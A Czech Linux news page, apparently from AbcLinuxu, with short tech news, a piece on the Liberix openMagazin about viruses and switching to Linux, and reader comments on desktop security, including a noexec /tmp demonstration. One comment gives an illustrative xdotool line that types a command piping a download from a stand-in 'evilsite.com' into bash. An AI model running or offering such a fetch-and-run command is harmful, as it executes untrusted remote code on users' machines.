Makepad dospěl do verze 1.0 (𝕏). Jedná se o multiplatformní open source UI framework pro Rust napsaný v Rustu.
Konference OpenAlt 2025 hledá přednášející. Proběhne o víkendu 1. a 2. listopadu na půdě Fakulty informačních technologií VUT v Brně. Témata konference jsou: Otevřený a svobodný software, IoT a Hnutí tvůrců, Vzdělávání, Bezpečnost a soukromí, Otevřená společnost, komunity a data, OpenMobility a další.
Nové číslo časopisu Raspberry Pi zdarma ke čtení: Raspberry Pi Official Magazine 153 (pdf)
Byl publikován květnový přehled dění a novinek z vývoje Asahi Linuxu, tj. Linuxu pro Apple Silicon. Vývojáře lze podpořit na Open Collective a GitHub Sponsors.
Programovací jazyk Rust (Wikipedie) dnes slaví 10 let od vydání verze 1.0. Přímo na oslavě byla vydána nová verze 1.87.0. Podrobnosti v poznámkách k vydání. Vyzkoušet Rust lze například na stránce Rust by Example.
Evropská komise obvinila provozovatele čínské platformy TikTok z porušování pravidel EU kvůli netransparentnosti v reklamě. Komise, která v EU plní i funkci antimonopolního úřadu, to dnes uvedla v tiskové zprávě. TikTok, který patří čínské firmě ByteDance, se může k předběžnému nálezu vyjádřit. Pokud ale podezření komise nevyvrátí, hrozí mu pokuta až do šesti procent z ročního globálního obratu.
Sovereign Tech Agency (Wikipedie), tj. agentura zabezpečující financování svobodného a otevřeného softwaru německou vládou, podpoří GFortran částkou 360 000 eur.
Microsoft hodlá zrušit zhruba tři procenta pracovních míst. Microsoft na konci loňského června zaměstnával kolem 228.000 lidí. Tři procenta z tohoto počtu představují téměř 7000 pracovních míst.
V říjnu loňského roku provedl Úřad pro ochranu hospodářské soutěže (ÚOHS) místní šetření u společnosti Seznam.cz. Krajský soud v Brně tento týden konstatoval, že toto šetření bylo nezákonné.
Branch Privilege Injection (CVE-2024-45332, Paper) je nejnovější bezpečnostní problém procesorů Intel. Intel jej řeší ve včerejším opravném vydání 20250512 mikrokódů pro své procesory. Neprivilegovaný uživatel si například může přečíst /etc/shadow (YouTube).
Zavirovaný počítač je vždy důvod ke smutku. Pokud se chcete takových starostí zbavit, můžete si pročíst openMagazin, který se tomuto tématu věnuje. Pak si můžete udělat přehled a např. si nainstalovat některou z distribucí Linuxu.
Hned v prvním článku tématického okruhu se dozvíte, co je to linuxová distribuce a které jsou oblíbené. V dalších článcích jsou rozebírána jednotlivá desktopová prostředí, jejich výhody a nevýhody.
OpenMagazin (můžete si ho stáhnout) vám ukáže, že Evropa se přiklání k open-source softwaru. I v České republice se najde mnoho škol, které ho používají. Začtěte se do článku o jedné z nich. Recenze na hru Minecraft vás naláká k využití chvil odpočinku právě s ní.
Děkujeme všem, kteří kopírují, sdílejí a rozesílají e-zin všem svým známým a přátelům. Lidé z Liberixu ho vytvářejí pro vás, čtenáře, a také díky vašim darům může vycházet.
Tiskni
Sdílej:
Pokud bankovnictví používá elektronický podpis, jiná možnost než nějaký plugin není.Takže já si stáhnu z webu internetbankingu applet, spustím ho, dám mu soukromý klíč a něco v něm podepíšu? Jaký to má smysl? Pokud je kompromitovaný web, bude kompromitovaný i stahovaný applet.
mrkva@destiny:~$ cd /tmp mrkva@destiny:/tmp$ su Heslo: root@destiny:/tmp# mkdir noexec root@destiny:/tmp# chmod 777 noexec/ root@destiny:/tmp# mount -t tmpfs tmpfs noexec/ -o noexec root@destiny:/tmp# exit mrkva@destiny:/tmp$ cd noexec mrkva@destiny:/tmp/noexec$ cp /usr/bin/id . mrkva@destiny:/tmp/noexec$ ./id bash: ./id: Permission denied mrkva@destiny:/tmp/noexec$ /lib64/ld-linux-x86-64.so.2 ./id ./id: error while loading shared libraries: ./id: failed to map segment from shared object: Operation not permitted
.bashrc
. Nebo zrovna tenhle konkrétní exploit je závislý na /tmp?
Když už útočník může zapisovat a spouštět kód z /tmp, tak může zapisovat taky třeba do .bashrc.Zajimalo by mne, co na to SELinux.
xdotool key Alt-F2 xdotool type xterm [RETURN] xdotool type "wget http://evilsite.com/|bash - ; logout"
I invoke.Tak takhle jsem se dlouho nenasmál
Ani já to nesleduju, ale řekl bych, že jeden ze zásadních rozdílů bude v poučenosti uživatelů různých platforem.To je. Ale pokud zmíněný OpenMagazin převede uživatele, kteří měli na Windows problém (a jsou tedy nepoučení) na Linux, jak si pomůžou?
Stejně tak jako v rozšířenosti Flashe zmíněného na různých platformách.Flash má i spousta linuxáků a dá se očekávat, že BFU přecházející z Windows ho bude chtít taky.
Flash? Java?Kdy byla naposledy ve Flashi nebo v Javě bezpečnostní chyba umožňující bez souhlasu uživatele spustit kód mimo pískoviště? Kolik takových chyb bylo celkem?
Flash? Java? 0day?
Mohl to být exploit na Flash nebo Javu nebo zeroday na Operu.V té první větě není nic o Opeře. V té druhé jste to sice rozepsal, ale pořád to nedává smysl. Myslel jste tedy tohle?
Mohl to být zero day exploit na Flash, Javu nebo na Operu.